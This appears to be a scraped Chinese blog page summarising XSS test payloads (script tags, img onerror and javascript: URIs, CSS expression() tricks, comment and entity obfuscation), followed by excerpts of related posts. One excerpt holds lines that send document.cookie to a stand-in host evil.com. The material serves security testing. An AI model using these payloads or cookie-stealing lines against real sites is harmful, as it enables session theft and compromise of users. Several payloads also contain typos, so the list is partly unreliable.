xss测试用例小结

<script>alert("跨站")</script> (最常用)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)"
width=150></img> (?用tab键弄出来的空格)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img>
(/**/ 表示注释)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert(‘xss‘))}</style>
<div style={left:expression (alert(‘xss‘))}></div>
<div style={left:exp/* */ression (alert(‘xss‘))}></div>
<div style={left:\0065\0078ression (alert(‘xss‘))}></div>
html 实体 <div style={left:&#x0065;xpression
(alert(‘xss‘))}></div>
unicode <div style="{left:expRessioN (alert(‘xss‘))}">[/post]

时间: 2024-10-16 16:02:14

xss测试用例小结的相关文章

xss、SQL测试用例小结

xss测试用例小结: <script>alert("跨站")</script> (最常用)<img scr=javascript:alert("跨站")></img><img scr="javascript: alert(/跨站/)></img><img scr="javas????cript:alert(/跨站/)" width=150></im

XSS测试用例与原理讲解

1.<a href="javascript:alert(32)">DIBRG</a>2.<img href="javascript:alert(32)">   在IE下可以,在FF下不可以3.<img src=" http://xss.jpg" onerror=alert('XSS')>     IE,FF下均可4.<img STYLE="background-image: url(

XSS跨站脚本小结(转)

原文链接:http://www.cnblogs.com/xiaozi/p/5588099.html#undefined XSS漏洞验证经常遇到一些过滤,如何进行有效验证和绕过过滤呢,这里小结一下常见的一些标签,如<a><img>等. 参考链接:http://www.jb51.net/tools/xss.htm  http://d3adend.org/xss/ghettoBypass ';alert(String.fromCharCode(88,83,83))//\';alert(S

接口测试用例小结

一.什么是接口测试 接口测试:测试系统组件间接口的一种测试.主要用于检测外部系统与系统之间以及系统内部各个子系统之间的交互点.重点测试的是数据的交换,这要求对业务逻辑有一定程度上的理解,对数据流向有较好的定位. 接口测试的过程:通过测试程序模拟客户端向服务器发送请求报文,服务器接收请求报文后对相应的报文做出处理然后再把应答报文发送给客户端,客户端接收应答报文这一过程(request→response) 接口测试的作用:降低成本,提高效率.接口测试能够提供系统复杂度上升情况下的低成本高效率的解决方

xss编码小结

一.JS编码与HTML编码区分: HTML实体可以使用十进制与十六进制编码:javascript可以使用Unicode与八进制与十六进制进行编码. 二.编码原理区分: 三.编码与非编码 对于JS编码: 1.<script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u002f\u0078\u0073\u0073\u002f\u0029");</script>(JS Unicode编码) 2. <script>

xss测试用例

1.<script> alert(1);</script> 2.<script>alert('xss');</script> 3.<script  src="http://www.evil.com/cookie.php"></script> 4.<script>location.href="http://www.evil.com/cookies.php?cookie="+escape

XSS跨站脚本小结

Xss概念 同源策略 javaScript中的同源,需要对比 两者中的协议.域名.端口.三者完全相同才认为是同源的,否则即是来自不同源的内容. Xss概念 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的. 用户提交的数据没有过滤,或者过滤不严格,输出到网页中 ,导致可以构造执行JS代码,或者修改网页内容. Xss危害 •盗取用户或者管理员的Cookie • XSS Worm • 挂马(水坑攻击) •

DVWA1.9平台XSS小结

LOW级别就不写了...... 直接上中高级别(结合源码更好理解) 1.XSS Reflected(Medium) 从源码中可以清楚的看到,输入的<script>标签被过滤掉了,看清了,只是<script>,尝试下大小写.双写或者img.a.iframe等标签吧!下面只演示一波大小写绕过.. 2.XSS Reflected(High) medium级别过滤掉了<script>标签,菜都可以菜刀high铁定过滤了大小写和双写了,直接放弃使用<script>标签

测试用例规范v2.0

1.引言 软件测试规范的编写是为了给测试人员在测试用例编写的过程中提供一个指导. 测试目的 测试是软件交付用户使用前一个不可缺少的环节,它存在的目的有四个:1)找到尽可能多的找到系统中的bug:2)关注用户的需求:3)根据测试最终结果分析和评估软件的质量风险:4)找到软件开发过程中的缺陷.具体内容可以上网查询. 2.了解业务 写测试用例前要了解这个系统的业务逻辑,将系统到各个子系统模块进行细化,从宏观到微观,从同级关系,上下级关系以及各系统间的接口交互进行了解. 就和看目录一样,先看所有的大标题